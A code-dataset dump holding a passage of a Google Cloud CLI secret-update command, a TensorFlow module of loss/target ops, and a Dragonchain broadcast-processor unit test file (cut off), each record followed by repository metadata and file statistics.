      $ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"
      --rotation-period="7200s"

    Update a secret to remove the next-rotation-time:

      $ {command} my-secret --remove-next-rotation-time

    Update a secret to clear rotation policy:

      $ {command} my-secret --remove-rotation-schedule
    """

    # Error shown when no update flag at all was supplied.
    NO_CHANGES_MESSAGE = (
        'There are no changes to the secret [{secret}] for update.')
    # Error shown when the named secret does not exist.
    SECRET_MISSING_MESSAGE = (
        'The secret [{secret}] cannot be updated because it does not exist. '
        'Please use the create command to create a new secret.')
    # Confirmation prompts: expiration settings eventually delete data.
    CONFIRM_EXPIRE_TIME_MESSAGE = (
        'This secret and all of its versions will be automatically deleted at '
        'the requested expire-time of [{expire_time}].')
    CONFIRM_TTL_MESSAGE = (
        'This secret and all of its versions will be automatically deleted '
        'after the requested ttl of [{ttl}] has elapsed.')

    @staticmethod
    def Args(parser):
        """Register the command's flags and flag groups on parser."""
        secrets_args.AddSecret(
            parser, purpose='to update', positional=True, required=True)
        labels_util.AddUpdateLabelsFlags(parser)
        secrets_args.AddSecretEtag(parser)
        secrets_args.AddUpdateExpirationGroup(parser)
        secrets_args.AddUpdateTopicsGroup(parser)
        secrets_args.AddUpdateRotationGroup(parser)

    def _RunUpdate(self, original, args):
        """Build the field mask from args and issue the update request.

        Args:
            original: the existing secret resource (fetched by Run).
            args: the parsed argparse namespace.

        Returns:
            The updated secret returned by the Secret Manager API.

        Raises:
            exceptions.MinimumArgumentException: if no update flag was given.
        """
        messages = secrets_api.GetMessages()
        secret_ref = args.CONCEPTS.secret.Parse()

        # Collect the list of update masks
        update_mask = []

        labels_diff = labels_util.Diff.FromUpdateArgs(args)
        if labels_diff.MayHaveUpdates():
            update_mask.append('labels')

        if args.IsSpecified('ttl'):
            update_mask.append('ttl')

        if args.IsSpecified('expire_time') or args.IsSpecified('remove_expiration'):
            update_mask.append('expire_time')

        # --remove-rotation-schedule clears both rotation fields at once.
        if ((args.IsSpecified('next_rotation_time') or
             args.IsSpecified('remove_next_rotation_time')) or
                args.IsSpecified('remove_rotation_schedule')):
            update_mask.append('rotation.next_rotation_time')

        if ((args.IsSpecified('rotation_period') or
             args.IsSpecified('remove_rotation_period')) or
                args.IsSpecified('remove_rotation_schedule')):
            update_mask.append('rotation.rotation_period')

        if args.IsSpecified('add_topics') or args.IsSpecified(
                'remove_topics') or args.IsSpecified('clear_topics'):
            update_mask.append('topics')

        # Validations
        if not update_mask:
            raise exceptions.MinimumArgumentException([
                '--clear-labels', '--remove-labels', '--update-labels', '--ttl',
                '--expire-time', '--remove-expiration', '--clear-topics',
                '--remove-topics', '--add-topics', '--next-rotation-time',
                '--remove-next-rotation-time', '--rotation-period',
                '--remove-rotation-period', '--remove-rotation-schedule'
            ], self.NO_CHANGES_MESSAGE.format(secret=secret_ref.Name()))

        labels_update = labels_diff.Apply(messages.Secret.LabelsValue,
                                          original.labels)
        # Fall back to the existing labels when the diff produced no change.
        labels = original.labels
        if labels_update.needs_update:
            labels = labels_update.labels

        # Expiration settings delete data; ask for confirmation first
        # (aborts in unattended mode or on "no").
        if args.expire_time:
            msg = self.CONFIRM_EXPIRE_TIME_MESSAGE.format(
                expire_time=args.expire_time)
            console_io.PromptContinue(
                msg, throw_if_unattended=True, cancel_on_no=True)

        if args.ttl:
            msg = self.CONFIRM_TTL_MESSAGE.format(ttl=args.ttl)
            console_io.PromptContinue(
                msg, throw_if_unattended=True, cancel_on_no=True)

        if 'topics' in update_mask:
            topics = secrets_util.ApplyTopicsUpdate(args, original.topics)
        else:
            topics = []

        secret = secrets_api.Secrets().Update(
            secret_ref=secret_ref,
            labels=labels,
            update_mask=update_mask,
            etag=args.etag,
            expire_time=args.expire_time,
            ttl=args.ttl,
            topics=topics,
            next_rotation_time=args.next_rotation_time,
            rotation_period=args.rotation_period)
        secrets_log.Secrets().Updated(secret_ref)

        return secret

    def Run(self, args):
        """Fetch the secret; error if it is missing, else delegate to _RunUpdate."""
        secret_ref = args.CONCEPTS.secret.Parse()

        # Attempt to get the secret
        secret = secrets_api.Secrets().GetOrNone(secret_ref)

        # Secret does not exist
        if secret is None:
            raise exceptions.InvalidArgumentException(
                'secret',
                self.SECRET_MISSING_MESSAGE.format(secret=secret_ref.Name()))

        # The secret exists, update it
        return self._RunUpdate(secret, args)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class UpdateBeta(Update):
    r"""Update a secret's metadata.

    Update a secret's metadata (e.g. labels). This command will
    return an error if given a secret that does not exist.

    ## EXAMPLES

    Update the label of a secret named 'my-secret'.

      $ {command} my-secret --update-labels=foo=bar

    Update the label of a secret using etag.

      $ {command} my-secret --update-labels=foo=bar --etag=\"123\"

    Update the expiration of a secret named 'my-secret' using a ttl.

      $ {command} my-secret --ttl="600s"

    Update the expiration of a secret named 'my-secret' using an expire-time.

      $ {command} my-secret --expire-time="2030-01-01T08:15:30-05:00"

    Remove the expiration of a secret named 'my-secret'.

      $ {command} my-secret --remove-expiration

    Update a secret to have a next-rotation-time:

      $ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"

    Update a secret to have a next-rotation-time and rotation-period:

      $ {command} my-secret --next-rotation-time="2030-01-01T15:30:00-05:00"
      --rotation-period="7200s"

    Update a secret to remove the next-rotation-time:

      $ {command} my-secret --remove-next-rotation-time

    Update a secret to clear rotation policy:

      $ {command} my-secret --remove-rotation-schedule
    """

    # NOTE(review): unlike the GA message, this one has no trailing period;
    # kept as-is since the string may be asserted on elsewhere.
    NO_CHANGES_MESSAGE = (
        'There are no changes to the secret [{secret}] for update')

    @staticmethod
    def Args(parser):
        """Register the command's flags and flag groups on parser."""
        secrets_args.AddSecret(
            parser, purpose='to update', positional=True, required=True)
        labels_util.AddUpdateLabelsFlags(parser)
        secrets_args.AddSecretEtag(parser)
        secrets_args.AddUpdateExpirationGroup(parser)
        secrets_args.AddUpdateRotationGroup(parser)
        secrets_args.AddUpdateTopicsGroup(parser)

    def _RunUpdate(self, original, args):
        """Build the field mask from args and issue the update request.

        Same flow as the GA command; the mask ordering and the flag list in
        the no-changes error differ slightly and are preserved as written.

        Args:
            original: the existing secret resource (fetched by Run).
            args: the parsed argparse namespace.

        Returns:
            The updated secret returned by the Secret Manager API.

        Raises:
            exceptions.MinimumArgumentException: if no update flag was given.
        """
        messages = secrets_api.GetMessages()
        secret_ref = args.CONCEPTS.secret.Parse()

        # Collect the list of update masks
        update_mask = []

        labels_diff = labels_util.Diff.FromUpdateArgs(args)
        if labels_diff.MayHaveUpdates():
            update_mask.append('labels')

        if args.IsSpecified('ttl'):
            update_mask.append('ttl')

        if args.IsSpecified('expire_time') or args.IsSpecified('remove_expiration'):
            update_mask.append('expire_time')

        if args.IsSpecified('add_topics') or args.IsSpecified(
                'remove_topics') or args.IsSpecified('clear_topics'):
            update_mask.append('topics')

        # --remove-rotation-schedule clears both rotation fields at once.
        if ((args.IsSpecified('next_rotation_time') or
             args.IsSpecified('remove_next_rotation_time')) or
                args.IsSpecified('remove_rotation_schedule')):
            update_mask.append('rotation.next_rotation_time')

        if ((args.IsSpecified('rotation_period') or
             args.IsSpecified('remove_rotation_period')) or
                args.IsSpecified('remove_rotation_schedule')):
            update_mask.append('rotation.rotation_period')

        # Validations
        if not update_mask:
            raise exceptions.MinimumArgumentException([
                '--clear-labels', '--remove-labels', '--update-labels', '--ttl',
                '--expire-time', '--remove-expiration', '--next-rotation-time',
                '--remove-next-rotation-time', '--rotation-period',
                '--remove-rotation-period', '--remove-rotation-schedule',
                '--clear-topics', '--remove-topics', '--add-topics'
            ], self.NO_CHANGES_MESSAGE.format(secret=secret_ref.Name()))

        labels_update = labels_diff.Apply(messages.Secret.LabelsValue,
                                          original.labels)
        # Fall back to the existing labels when the diff produced no change.
        labels = original.labels
        if labels_update.needs_update:
            labels = labels_update.labels

        if 'topics' in update_mask:
            topics = secrets_util.ApplyTopicsUpdate(args, original.topics)
        else:
            topics = []

        # Expiration settings delete data; ask for confirmation first
        # (aborts in unattended mode or on "no").
        if args.expire_time:
            msg = self.CONFIRM_EXPIRE_TIME_MESSAGE.format(
                expire_time=args.expire_time)
            console_io.PromptContinue(
                msg, throw_if_unattended=True, cancel_on_no=True)

        if args.ttl:
            msg = self.CONFIRM_TTL_MESSAGE.format(ttl=args.ttl)
            console_io.PromptContinue(
                msg, throw_if_unattended=True, cancel_on_no=True)

        secret = secrets_api.Secrets().Update(
            secret_ref=secret_ref,
            labels=labels,
            update_mask=update_mask,
            etag=args.etag,
            expire_time=args.expire_time,
            ttl=args.ttl,
            topics=topics,
            next_rotation_time=args.next_rotation_time,
            rotation_period=args.rotation_period)
        secrets_log.Secrets().Updated(secret_ref)

        return secret

    def Run(self, args):
        """Fetch the secret; error if it is missing, else delegate to _RunUpdate."""
        secret_ref = args.CONCEPTS.secret.Parse()

        # Attempt to get the secret
        secret = secrets_api.Secrets().GetOrNone(secret_ref)

        # Secret does not exist
        if secret is None:
            raise exceptions.InvalidArgumentException(
                'secret',
                self.SECRET_MISSING_MESSAGE.format(secret=secret_ref.Name()))

        # The secret exists, update it
        return self._RunUpdate(secret, args)
| 34.874618
| 80
| 0.690986
| 1,435
| 11,404
| 5.338676
| 0.154007
| 0.040726
| 0.054301
| 0.036027
| 0.832137
| 0.816734
| 0.792325
| 0.792325
| 0.790628
| 0.785798
| 0
| 0.012744
| 0.201859
| 11,404
| 326
| 81
| 34.981595
| 0.828939
| 0.255261
| 0
| 0.815217
| 0
| 0
| 0.184451
| 0.054265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032609
| false
| 0
| 0.059783
| 0
| 0.152174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac6a322ae63cd9b4b7159a51d97ed1e33eb70a83
| 4,781
|
py
|
Python
|
ml/module/target.py
|
xiaoshenxian/mlxsx
|
a20558482f0d71bdd099aaff8be16ac29d4b98e2
|
[
"Apache-2.0"
] | 2
|
2019-06-16T03:06:52.000Z
|
2019-06-21T03:38:12.000Z
|
ml/module/target.py
|
xiaoshenxian/mlxsx
|
a20558482f0d71bdd099aaff8be16ac29d4b98e2
|
[
"Apache-2.0"
] | null | null | null |
ml/module/target.py
|
xiaoshenxian/mlxsx
|
a20558482f0d71bdd099aaff8be16ac29d4b98e2
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import tensorflow as tf
class TargetOp:
    """Base interface for building a model's target (output/loss) sub-graph.

    Subclasses implement three graph-building hooks; this base also provides
    a helper that fills in missing initializer/regularizer arguments from the
    current variable scope.
    """

    def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
        """Build the intermediate projection from input_data; no-op in the base."""
        pass

    def build_training(self, input_data, initializer=None, regularizer=None, name=None):
        """Build the training loss op; no-op in the base."""
        pass

    def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
        """Build the inference output op; no-op in the base."""
        pass

    def _get_init(self, initializer=None, regularizer=None):
        """Return (initializer, regularizer), defaulting each from the current scope."""
        scope = tf.get_variable_scope()
        if initializer is None:
            initializer = scope.initializer
        if regularizer is None:
            regularizer = scope.regularizer
        return initializer, regularizer
class RegressionTargetOp(TargetOp):
    """Regression target: a single dense output trained with squared error."""

    def __init__(self, build_mid_func=None):
        # Optional override for the default single-unit dense projection.
        self.build_mid_func = build_mid_func

    def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
        """Project input_data to one scalar per example (or via the custom func)."""
        initializer, regularizer = self._get_init(initializer, regularizer)
        if self.build_mid_func is not None:
            return self.build_mid_func(input_data, initializer, regularizer, name=name)
        return tf.layers.dense(
            input_data, 1,
            kernel_initializer=initializer, kernel_regularizer=regularizer,
            name=name)

    def build_training(self, input_data, initializer=None, regularizer=None, name=None):
        """Return element-wise squared error; input_data is (targets, predicts)."""
        labels, predictions = input_data
        return tf.square(predictions - labels, name=name)

    def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
        """The raw projection already is the prediction; pass it through."""
        return input_data
class LrTargetOp(TargetOp):
    """Logistic-regression target: one logit trained with sigmoid cross-entropy."""

    def __init__(self, build_mid_func=None):
        # Optional override for the default single-unit dense projection.
        self.build_mid_func = build_mid_func

    def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
        """Project input_data to one logit per example (or via the custom func)."""
        initializer, regularizer = self._get_init(initializer, regularizer)
        if self.build_mid_func is not None:
            return self.build_mid_func(input_data, initializer, regularizer, name=name)
        return tf.layers.dense(
            input_data, 1,
            kernel_initializer=initializer, kernel_regularizer=regularizer,
            name=name)

    def build_training(self, input_data, initializer=None, regularizer=None, name=None):
        """Return sigmoid cross-entropy loss; input_data is (targets, logits)."""
        labels, logits = input_data
        return tf.nn.sigmoid_cross_entropy_with_logits(
            labels=labels, logits=logits, name=name)

    def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
        """Turn logits into probabilities."""
        return tf.nn.sigmoid(input_data, name=name)
class SoftmaxTargetOp(TargetOp):
    """Multi-class target: dense logits trained with (sparse) softmax cross-entropy."""

    def __init__(self, result_shape, top_k, sparse_target=False, build_mid_func=None):
        # Number of classes the dense layer projects to.
        self.result_shape = result_shape
        # How many top classes build_inference returns.
        self.top_k = top_k
        # True when targets are class indices rather than one-hot vectors.
        self.sparse_target = sparse_target
        # Optional override for the default dense projection.
        self.build_mid_func = build_mid_func

    def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
        """Project input_data to result_shape logits (or via the custom func)."""
        initializer, regularizer = self._get_init(initializer, regularizer)
        if self.build_mid_func is not None:
            return self.build_mid_func(input_data, initializer, regularizer, name=name)
        return tf.layers.dense(
            input_data, self.result_shape,
            kernel_initializer=initializer, kernel_regularizer=regularizer,
            name=name)

    def build_training(self, input_data, initializer=None, regularizer=None, name=None):
        """Return softmax cross-entropy loss; input_data is (targets, logits)."""
        labels, logits = input_data
        if self.sparse_target:
            return tf.nn.sparse_softmax_cross_entropy_with_logits(
                labels=labels, logits=logits, name=name)
        return tf.nn.softmax_cross_entropy_with_logits(
            labels=labels, logits=logits, name=name)

    def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
        """Return (values, indices) of the top_k classes by softmax probability."""
        values, indices = tf.nn.top_k(
            tf.nn.softmax(input_data, name=name), k=self.top_k)
        return values, indices
class RankNetTargetOp(TargetOp):
    """Pairwise ranking (RankNet-style) target over consecutive example pairs."""

    def __init__(self, build_mid_func=None):
        # Optional override for the default single-unit dense projection.
        self.build_mid_func = build_mid_func

    def build_mid(self, input_data, initializer=None, regularizer=None, name=None):
        """Project input_data to one score per example (or via the custom func)."""
        initializer, regularizer = self._get_init(initializer, regularizer)
        if self.build_mid_func is not None:
            return self.build_mid_func(input_data, initializer, regularizer, name=name)
        return tf.layers.dense(
            input_data, 1,
            kernel_initializer=initializer, kernel_regularizer=regularizer,
            name=name)

    def build_training(self, input_data, initializer=None, regularizer=None, name=None):
        """Return pairwise sigmoid cross-entropy; input_data is (targets, logits).

        NOTE: as a side effect the pairwise tensors are stored on the instance
        as self.targets and self.logits (named 'targets'/'logits' in the graph),
        matching the original implementation.
        """
        raw_targets, raw_logits = input_data
        # Differences between each consecutive pair, squashed to (0, 1).
        pair_diff = tf.subtract(raw_targets[:-1], raw_targets[1:])
        self.targets = tf.truediv(1.0, 1.0 + tf.exp(-pair_diff), name='targets')
        self.logits = tf.subtract(raw_logits[:-1], raw_logits[1:], name='logits')
        return tf.nn.sigmoid_cross_entropy_with_logits(
            labels=self.targets, logits=self.logits, name=name)

    def build_inference(self, input_data, initializer=None, regularizer=None, name=None):
        """Turn a score (or score difference) into a probability."""
        return tf.sigmoid(input_data, name=name)
| 47.81
| 140
| 0.7283
| 635
| 4,781
| 5.244094
| 0.099213
| 0.083784
| 0.072072
| 0.144144
| 0.777778
| 0.757357
| 0.757357
| 0.757357
| 0.757357
| 0.738739
| 0
| 0.003039
| 0.174022
| 4,781
| 99
| 141
| 48.292929
| 0.840213
| 0.004392
| 0
| 0.623377
| 0
| 0
| 0.002732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25974
| false
| 0.038961
| 0.012987
| 0.038961
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ac76bc531c3f5b943ca4ca8ac0872f28bc468c89
| 29,025
|
py
|
Python
|
dragonchain/broadcast_processor/broadcast_processor_utest.py
|
cheeseandcereal/dragonchain
|
34d34e344b887c2a0eeb591ede2015cc2506a323
|
[
"Apache-2.0"
] | null | null | null |
dragonchain/broadcast_processor/broadcast_processor_utest.py
|
cheeseandcereal/dragonchain
|
34d34e344b887c2a0eeb591ede2015cc2506a323
|
[
"Apache-2.0"
] | null | null | null |
dragonchain/broadcast_processor/broadcast_processor_utest.py
|
cheeseandcereal/dragonchain
|
34d34e344b887c2a0eeb591ede2015cc2506a323
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Dragonchain, Inc.
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
# You may obtain a copy of the Apache License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
import importlib
import asyncio
import unittest
from unittest.mock import patch, MagicMock, AsyncMock
from dragonchain import test_env # noqa: F401
from dragonchain.broadcast_processor import broadcast_processor
from dragonchain import exceptions
class BroadcastProcessorTests(unittest.IsolatedAsyncioTestCase):
def setUp(self):
    """Reset broadcast_processor's module-level state before each test."""
    # Reload so globals mutated by a previous test cannot leak into this one.
    importlib.reload(broadcast_processor)
    broadcast_processor.BROADCAST = "true"
    broadcast_processor.LEVEL = "1"
    # Fake dragonnet requirements: level N needs N verification nodes.
    broadcast_processor._requirements = {
        "l2": {"nodesRequired": 2},
        "l3": {"nodesRequired": 3},
        "l4": {"nodesRequired": 4},
        "l5": {"nodesRequired": 5},
    }
def test_setup_raises_error_when_not_level_1(self):
    """setup() must refuse to run on a chain that is not level 1."""
    broadcast_processor.LEVEL = "2"
    with self.assertRaises(RuntimeError):
        broadcast_processor.setup()
def test_setup_raises_error_when_not_broadcasting(self):
    """setup() must refuse to run when broadcasting is disabled."""
    broadcast_processor.BROADCAST = "false"
    with self.assertRaises(RuntimeError):
        broadcast_processor.setup()
@patch("dragonchain.broadcast_processor.broadcast_processor.dragonnet_config.DRAGONNET_CONFIG", 4)
def test_setup_sets_module_vars_correctly(self):
    """setup() copies DRAGONNET_CONFIG into the module-level _requirements."""
    broadcast_processor.setup()
    self.assertEqual(broadcast_processor._requirements, 4)
def test_needed_verifications_returns_correct_value_from_requirements(self):
    """needed_verifications(level) reads nodesRequired from _requirements."""
    # setUp configured level N to require exactly N nodes.
    for level in (2, 3, 4, 5):
        self.assertEqual(broadcast_processor.needed_verifications(level), level)
def test_chain_id_from_matchmaking_claim_returns_correct(self):
    """chain_id_set_from_matchmaking_claim extracts the ids for the requested level."""
    fake_claim = {"validations": {"l2": {"test2": {}}, "l3": {"test3": {}}, "l4": {"test4": {}}, "l5": {"test5": {}}}}
    for level in (2, 3, 4, 5):
        expected = {"test" + str(level)}
        self.assertEqual(
            broadcast_processor.chain_id_set_from_matchmaking_claim(fake_claim, level),
            expected,
        )
def test_get_level_from_storage_location_returns_level_string(self):
    """A '-lN-' tag inside the storage key maps to the level string 'N'."""
    self.assertEqual(
        broadcast_processor.get_level_from_storage_location("/BLOCK/something-l3-asdfsdf"),
        "3",
    )
def test_get_level_from_storage_location_returns_none_when_fails(self):
    """A storage key without a level tag yields None."""
    location = "/BLOCK/something-apples-asdfsdf"
    self.assertIsNone(broadcast_processor.get_level_from_storage_location(location))
def test_notification_urls_returns_set(self):
    """get_notification_urls returns a set even for an unconfigured key."""
    result = broadcast_processor.get_notification_urls("banana")
    # Exact-type check on purpose (not isinstance), matching original intent.
    self.assertEqual(type(result), set)
@patch.dict("dragonchain.broadcast_processor.broadcast_processor.VERIFICATION_NOTIFICATION", {"all": ["url1"]})
def test_notification_urls_returns_values_from_env(self):
    """Configured notification urls are returned as a set."""
    urls = broadcast_processor.get_notification_urls("all")
    self.assertEqual(urls, {"url1"})
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration",
    return_value={"network": "bitcoin mainnet", "broadcastInterval": 1.23},
)
def test_set_l5_wait_time_success(self, mock_get_rego):
    """Wait time is computed from the chain's network and broadcastInterval."""
    self.assertEqual(broadcast_processor.set_l5_wait_time("chainid"), 15228)  # (600 * 6 * 3) + ((1.23 * 60) *60)
    mock_get_rego.assert_called_once_with("chainid")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration", return_value={"fruit": "banana"})
def test_set_l5_wait_time_throws_exception(self, mock_get_rego):
    """Malformed registration data falls back to the hardcoded wait time."""
    self.assertEqual(broadcast_processor.set_l5_wait_time("chainid"), 43200)  # hardcoded fallback value
    mock_get_rego.assert_called_once_with("chainid")
@patch.dict("dragonchain.broadcast_processor.broadcast_processor._l5_wait_times", {"banana": 123})
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration")
def test_get_l5_wait_time_is_cached(self, mock_get_rego):
    """A cached wait time is returned without a matchmaking round-trip."""
    self.assertEqual(broadcast_processor.get_l5_wait_time("banana"), 123)
    mock_get_rego.assert_not_called()
@patch.dict("dragonchain.broadcast_processor.broadcast_processor._l5_wait_times", {})
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration",
    return_value={"network": "bitcoin mainnet", "broadcastInterval": 1.23},
)
def test_get_l5_wait_time_not_cached(self, mock_get_rego):
    """On a cache miss the wait time is computed from matchmaking registration."""
    self.assertEqual(broadcast_processor.get_l5_wait_time("chainid"), 15228)
    mock_get_rego.assert_called_once_with("chainid")
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto")
def test_broadcast_futures_gets_broadcast_dto_for_block_id(self, patch_get_broadcast):
    """make_broadcast_futures fetches the broadcast DTO for (level, block_id)."""
    broadcast_processor.make_broadcast_futures(None, "id", 3, set())
    patch_get_broadcast.assert_called_once_with(3, "id")
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", return_value="dto")
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.create_task", return_value="task")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_dragonchain_address", return_value="addr")
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.authorization.generate_authenticated_request",
    return_value=({"header": "thing"}, b"some data"),
)
def test_broadcast_futures_returns_set_of_futures_from_session_posts(
    self, mock_gen_request, mock_get_address, mock_create_task, patch_get_broadcast
):
    """One authenticated POST per receiving chain, wrapped in a task set."""
    fake_session = MagicMock()
    fake_session.post = MagicMock(return_value="session_request")
    self.assertEqual(broadcast_processor.make_broadcast_futures(fake_session, "block_id", 2, {"chain_id"}), {"task"})
    mock_get_address.assert_called_once_with("chain_id")
    mock_create_task.assert_called_once_with("session_request")
    mock_gen_request.assert_called_once_with("POST", "chain_id", "/v1/enqueue", "dto")
    # Verify the exact request shape, including the receipt-wait deadline header.
    fake_session.post.assert_called_once_with(
        url="addr/v1/enqueue",
        data=b"some data",
        headers={"header": "thing", "deadline": str(broadcast_processor.BROADCAST_RECEIPT_WAIT_TIME)},
        timeout=broadcast_processor.HTTP_REQUEST_TIMEOUT,
    )
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.create_task", return_value="task")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_dragonchain_address", return_value="addr")
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", return_value="dto")
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.authorization.generate_authenticated_request",
    return_value=({"header": "thing"}, b"some data"),
)
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration",
    return_value={"network": "bitcoin mainnet", "broadcastInterval": 1.23},
)
def test_broadcast_futures_sets_deadline_header_for_l5(self, mock_get_rego, mock_gen_request, mock_get_address, mock_create_task, mock_dto):
    """Level-5 broadcasts use the computed L5 wait time as the deadline header."""
    fake_session = MagicMock()
    fake_session.post = MagicMock(return_value="session_request")
    broadcast_processor.make_broadcast_futures(fake_session, "block_id", 5, {"chain_id"})
    # "15228" matches the wait time derived from the mocked registration above.
    fake_session.post.assert_called_once_with(
        url="addr/v1/enqueue",
        data=b"some data",
        headers={"header": "thing", "deadline": "15228"},
        timeout=broadcast_processor.HTTP_REQUEST_TIMEOUT,
    )
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", return_value="dto")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_dragonchain_address", return_value="addr")
@patch("dragonchain.broadcast_processor.broadcast_processor.authorization.generate_authenticated_request", side_effect=Exception)
def test_broadcast_futures_doesnt_return_future_for_exception_with_a_chain(self, mock_gen_req, mock_get_address, patch_get_broadcast):
    """A per-chain failure is skipped rather than aborting the whole broadcast."""
    fake_session = MagicMock()
    fake_session.post = MagicMock(return_value="session_request")
    self.assertEqual(broadcast_processor.make_broadcast_futures(fake_session, "block_id", 2, {"chain_id"}), set())
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", side_effect=exceptions.NotEnoughVerifications)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.increment_storage_error_sync")
def test_broadcast_futures_returns_none_on_get_broadcast_dto_failure(self, mock_increment_error, patch_get_broadcast):
    """A DTO build failure returns None and records a storage error for the block."""
    self.assertIsNone(broadcast_processor.make_broadcast_futures(None, "block_id", 2, {"chain_id"}))
    mock_increment_error.assert_called_once_with("block_id", 2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async", return_value=[])
async def test_process_blocks_gets_blocks_for_broadcast(self, mock_get_blocks, mock_gather):
    """process_blocks_for_broadcast starts by fetching the pending block list."""
    # Resolve the mocked gather() future so the coroutine can run to completion.
    mock_gather.return_value.set_result(None)
    await broadcast_processor.process_blocks_for_broadcast(None)
    mock_get_blocks.assert_awaited_once()
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check",
    return_value={"metadata": {"dcId": "banana-dc-id"}},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
    "dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
    return_value=[("block_id", 0)],
)
async def test_process_blocks_calls_matchmaking_for_claims(
    self, mock_get_blocks, mock_gather, mock_get_block_level, mock_chain_id_set, mock_get_futures, mock_schedule_broadcast, mock_claim
):
    """Each pending block gets a matchmaking claim, resolved to chain ids."""
    # Resolve the mocked gather() future so the coroutine can run to completion.
    mock_gather.return_value.set_result(None)
    await broadcast_processor.process_blocks_for_broadcast(None)
    mock_claim.assert_called_once_with("block_id", broadcast_processor._requirements)
    mock_chain_id_set.assert_called_once_with({"metadata": {"dcId": "banana-dc-id"}}, 2)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check", side_effect=exceptions.InsufficientFunds)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.sleep")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=None)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_sleeps_with_insufficient_funds(self, mock_get_blocks, mock_gather, mock_get_block_level, mock_sleep, mock_claim):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_sleep.assert_awaited_once_with(1800)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.time.time", return_value=123)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value=None,
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
